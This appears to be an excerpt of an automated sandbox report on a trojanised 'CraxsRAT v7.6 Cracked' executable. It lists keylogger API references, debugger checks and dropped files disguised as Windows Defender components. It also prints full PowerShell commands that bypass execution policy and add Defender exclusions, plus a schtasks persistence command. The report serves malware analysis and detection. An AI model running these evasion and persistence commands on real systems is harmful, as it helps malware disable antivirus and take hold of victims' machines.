Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: orGZS/ElwmQgWtsE4+g7aNV9LPOJ7GB5nAT8FOHgFSFlQVGL+o4meGHNgBvAuO6za7bux5bHCqJ5
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: HAxdT8A0DHihW1CfT909Vugky1knpRlFS6fHMeWDQ++9nxf5UCBIlQX/MGDrMUmBsbTuSCwQJbcF
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Mz7AgPEJVab3T3wggQAVu5OwdqLHHV5EEve6Wm8GS5NlVjkHmQDkDLfVpKZq53HgfsXtKBaH+QZA
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: w0lyngvPP2yWdkRpvmCIFWo0WZB40kEMYz8/8fJK4M9AKWzMwH48gsjFEfXI8PHsltUTHOrk25o1
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: m7iDErpFR5XIY/hhECGlQX+yfRy98F3cHHd0J9Pb8+PuwfLhQGXAVxRmXW70qvmCi3xauxUvFRYH
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: exSU40Pq+ak9IUWnDdd+8exJK/EoPlm4WiDYhNIB+WJUdafUGpg/WaBQEmUW8DJ4lCkzwMhDWPlO
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: 404MYBcp7Wyfz9MxMmbz3B9ix6xt08vmcI+Af4Gl6aZKnfO1qaD2wtU6/ICqXbKnHNA7DFKvAj0R
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000C371000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: bcuYPNIdayzcwIFv5DWKZhJfVOYk8DxHRwJS2SosJlKBX4G6o5B1s7oKkrqEmutFBIwJJHDSZhUm
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: tYcWIjYXY0HJ4ki46tgcKizCwIdU4ULjQXRO9d3I86dvmCiqB8krVyjYlYv9jbdd95TsqArEvNZ3
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: 3iiAvtSozcaRvWNQdbGKSL0dAhBHGFSWFbqOYeTWwVNL8d7M6jbIzdmtXHD7mGBnvpGoHw8oaWAO
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: 64CJCukzQR9vu/OTVD8sbeCkhY5Q/hgFStHqVIA7vRsjht3DLUrMAI7ld1x6Nxcf/zDezF54rWdU
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: NELz7igb5bBWFXvMCirWY+bcTkqlKhs9CzVUG2rFukoG+bplwvpm53+mqAhGLpb2Mtv88oyBN83m
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Wr8Tr69FDedKdnfHQ59zd82MisZFwCAE9qZotz/epkNbuK4TfC0MYYKHIjc3naqVdG/TAHfvmCIZ
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: yaeOd3ob8h4DbMdlPyPp7a7bUB/tLW2LAuI8zWBdEAf9eSI4OQeMU7xgDQoz4K0M1HCa1vaEm5Ec
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000C371000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: NJtD3kQVqSrqEMuguQbDw+OlZEu5LP3QwdvRE1ItZW2gIZPOyD/aRvfVccM0Ai5NcsZapCmNz7t5
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: lnnTUrbwq/Mib16r/zzyVMci2kG4hMtqBOyeFC+cQlx9o7pVSQU8kH8onVCdtbj7AM7+mI2o5uWl
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: 7H+3SiHp1VmcIoj2x0PnuQW0c8dCW2VOwMUQxb+jysHlQfeh44BD8u0nN2avBIvnJS3QbJHAdS6j

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process queried: DebugPort			Jump to behavior

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: Windows Defender Real Time Protection.exe.0.dr, kl.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: Windows Defender Real Time Protection.exe.0.dr, kl.cs	Reference to suspicious API methods: GetAsyncKeyState(num2)
Source: Windows Defender Real Time Protection.exe.0.dr, OK.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe'
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender Notification.exe'
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender Notification.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\CraxsRat.exe "C:\Users\user\AppData\Local\Temp\CraxsRat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Notification" /tr "C:\Users\user\AppData\Roaming\Windows Defender Notification.exe"	Jump to behavior

Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerp
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@9

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\CraxsRat.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
